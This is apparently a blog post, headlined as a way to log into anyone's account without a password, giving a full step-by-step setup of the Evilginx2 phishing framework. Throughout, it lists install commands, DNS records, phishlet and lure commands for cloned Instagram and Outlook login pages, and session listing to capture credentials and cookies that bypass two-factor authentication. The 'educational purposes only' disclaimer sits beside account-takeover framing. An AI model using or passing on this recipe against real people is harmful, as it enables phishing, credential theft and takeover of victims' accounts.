😱 How to Login ANY/Anyone’s Account WITHOUT Password? Guide — Advance Phishing?

BYPASS 2-Step Verification - A Complete Guide to Evilginx2

XIT
8 min readMar 3

--

Follow XIT on medium & UglyCompany on Telegram for more..

As technology advances, so does the security measures to protect sensitive information. One such measure is the two-factor authentication (2FA) protocol. However, despite its effectiveness, it is not completely immune to attacks. Enter Evilginx2, a powerful tool that can bypass 2FA and allow you to log in to any social media account without a password. In this guide, I’ll explain what Evilginx2 is, how to install it step-by-step, and its requirements.

What is Evilginx2?

Evilginx2 is a phishing tool that can steal login credentials, including 2FA Auth codes, from unsuspecting targeted victims. It does this by creating a fake cloned login page that looks exactly like the real one. Once the victim enters their login details in the cloned page, Evilginx2 captures them and sends them to the attacker server. Evilginx2 is an advanced version of Evilginx, which was created by security researcher Kuba Gretzky.

Evilginx logo (winter update)

⚠️ It’s important to note that Evilginx2 is a tool for educational purposes only. It should not be used for illegal activities such as phishing or to harm others in any form. Using Evilginx2 to steal login credentials is completely illegal and can result in severe legal consequences for you . Always use ethical hacking practices and obtain proper authorization before conducting any security testing.

Installation Requirements

You must meet the following requirements before installing Evilginx2:

  1. VPS: Evilginx2 is compatible with Windows, macOS, and Linux. Linux, on the other hand, is the system of choice. (I’m using Ubuntu OS in this tuto.)
  2. Domain Name: Evilginx2 cannot function without a domain name. A domain name can be purchased from any domain registrar. I prefer Namecheap . (I’m using Namecheap Domain in this tuto.)

Other requirements: (will install these during our installation).

  1. Go Programming Language: Evilginx2 is written in Go, so the Go programming language must be installed on your computer. I’ll guide you to install during our installation. (used version 1.14.1)
  2. Docker: Evilginx2 runs as a Docker container, which provides a consistent and portable environment for running the application. I’ll guide you to install during our installation.

Step-by-Step Installation Guide

Now once you are all set & have met the installation requirements as listed above, then lets start with a step-by-step guide to installing Evilginx2: (No time waste on explaining the things around, just copy and paste the commands step by step like a pro ;))

1. Open the terminal and login as a superuser:

sudo -i

2. Update the package list and upgrade existing packages:

apt update && apt upgrade -y

3. Download and extract the latest version of Go:

wget https://dl.google.com/go/go1.14.1.linux-amd64.tar.gz

📂 unzip the downloaded tar file

tar -C /usr/local -xzf go1.14.1.linux-amd64.tar.gz

4. Set the environment variables for Go:

export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin
source .profile

5. Install Git and Make:

sudo apt-get -y install git make

6. Clone the Evilginx2 repository from GitHub:

git clone https://github.com/kgretzky/evilginx2.git

7. Navigate to the Evilginx2 directory:

cd evilginx2/

8. Run the make command to build Evilginx2:

make

9. Install Evilginx2:

sudo make install

10. Update the package list:

sudo apt-get update

11. Install the certificates package:

sudo apt-get install certificates

12. Install the curl, gnupg, and lsb-release packages:

sudo apt-get install curl gnupg lsb-release

13. Create a keyring directory and add the Docker GPG key:

sudo mkdir -p /etc/apt/keyrings
curl -fsSl https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg

14. Add the Docker repository to the sources list:

echo \ "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/debian \ $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null

15. Update the package list:

sudo apt-get update

16. Install Docker:

sudo apt-get install docker-ce docker-ce-cli containerd.io docker-compose-plugin

17. Start Evilginx2:

sudo evilginx

If it successfully show the similar below screen then 🎉 congratulations! You have successfully installed Evilginx2.

As we have successfully installed Evilginx2, let’s configure our domain by using the “config domain” command followed by your domain name, like this:

config domain yourdomainname.com

Now, lets configure IP address by using the “config ip” command followed by the IPv4 address of your server, like this:

config ip <ipv4 ip of server>

Make sure you use Public IP of your server. Check your Public IP using “ifconfig” as shown below:

In case you encounter any errors during the installation process, drop your issue in the comment below or refer to the Evilginx2 documentation for troubleshooting tips.

this is how it will look after configuring both domain and ip

Now, lets configure our domain on Namecheap. Follow the below steps along with me and you are good to go..

Step1: Log in to your Namecheap account and navigate to your domain name & click on MANAGE.

Step2: Make sure your nameservers are set to Namecheap BasicDNS

Step3: Click on the “Advanced DNS” tab.

Step4: Scroll down to the “Host Records” section and click on the “Add New Record” button.

Step5: In the “Type” drop-down menu, select “A Record”.

What is A Record? -> A records is used to resolve a hostname which corresponds to an IPv4 address. format is like: X.X.X.X

Step6: In the “Host” field, enter the subdomain or “@” to represent the root domain. In the “Value” field, enter the PUBLIC IP address of your server where Evilginx2 is installed. (above I’ve shown how you can get public IP of your server). Leave the “TTL” field as default (Automatic) & Click on the “Save All Changes” button.

Similarly add other A records also, you just have to repeat the Step5 & Step6; just replace the “Host” field and other fields will be the same as we did for @ . Below are the Hosts to add

  1. @
  2. www.xit
  3. xit
  4. m.xit
  5. test.xit

Now, return to the Ubuntu VPS server and activate the phishlet using the following command:

phishlets hostname <phishlet-name> xit.<yourdomain.com>
it should look such, here i’m trying to create instagram phishlet

Then, enable the phishlet using below command:

phishlets enable <phishlet-name>

Note: If it shows you the error as shown below then follow the same steps that we followed to add A record, here just the Type will be AAAA record.

What is AAAA Record? -> AAAA records are used to resolve a domain name which corresponds to an IPv6 address. format is like: X:X:X:X:X:X:X:X

You can get your IPv6 address using the same ifconfig command on your Ubuntu VPS server as shown below:

Once you add AAAA record, it should look like as shown below:

Then run the same recent command & it should display the message as shown below if it successfully set up the SSL/TLS certificates for your domain.

Next, using ‘lures create’ command we will enable the specific phishlet we require. Use the below commands:

lures create <phishlet-name>

It gives a unique ID once its successfully created. Use the same ID in further commands. (as it might be different for each of us)

Now, set Redirect URL for the page using the command below:

lures edit <ID> redirect_url <url-to-redirect>

Now, get your phishing page URL using below command:

lures get-url <ID>

Thats all, everything is done. The above URL will display a login page of instagram as shown below:

Once the user login on the page you can list all the ‘sessions’ using sessions command as shown below:

Later, I even tried for some other websites like outlook later and faced some errors which got resolved so will attach the solutions below:

ERROR while enabling outlook phishlet

The above error looked more similar to the recent we faced earlier. (AAAA record error). Here the subdomain are different like “login” & “outlook”. Then I added those AAAA records and it worked well after that.

AAAA records that I added for outlook

Seriously! I was totally Impressed with the look and user experience for each phishlet. Even after I logged into my accounts it allowed me to surf the whole account on the same phishing URL as if the URL belongs to the real website. Even was able to bypass the 2-Factor Authentication using the session cookies that were captured by the phishlets.

Conclusion

In short, Evilginx2 is a powerful tool that can bypass 2FA and steal login credentials from unsuspecting victims. However, it’s important to use it responsibly and only for educational purposes. By following the step-by-step guide in this article, you can install Evilginx2 on your computer and test it on a fake login page. Remember to always use ethical hacking practices and obtain proper authorization before conducting any security testing. You can find a more comprehensive guides like this here on my page. Also if you like the content then try a tip for me, which motivates me to write more like this. Also make sure you Follow so you will be notified once we upload some cool stuff like such.

A supporter is worth a thousand followers. 😊

--

--

XIT

SHHH! The voice of none is stronger than the voice of one.